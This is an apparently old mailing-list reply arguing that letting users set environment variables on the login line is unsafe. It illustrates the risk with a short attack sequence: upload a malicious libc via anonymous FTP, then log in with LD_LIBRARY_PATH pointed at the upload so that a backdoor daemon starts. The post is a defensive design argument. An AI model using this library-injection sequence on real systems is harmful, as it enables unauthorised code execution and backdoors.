> What is the concern about letting a user set some environment
> variables on the line with their login name? What does this
> mechanism allow that they couldn't have done anyway as soon as they
> get their shell prompt?
The "user" being logged in to may not _have_ a shell prompt.
Imagine you have a UUCP link to "host", login uume, and therefore know
the password - or perhaps you stole it from the real uume's owner. Or
perhaps "host" supports anonymous uucp.
% ftp host
Username: anonymous
Password: dream@on
ftp> cd pub/incoming
ftp> bin
ftp> put libc.so.12.5
ftp> quit
% telnet host
login: uume LD_LIBRARY_PATH=/var/spool/ftp/pub/incoming
...and as soon as anything dynamically linked gets run, this little
daemon appears on port 32109, or something comparably evil.
No, I prefer just stuffing everything after the login name into a
LOGIN_ARGS variable and letting that be processed however software
wishes. A normal user may choose to "eval $LOGIN_ARGS"....
der Mouse
mouse@rodents.montreal.qc.ca
01 EE 31 F6 BB 0C 34 36 00 F3 7C 5A C1 A0 67 1D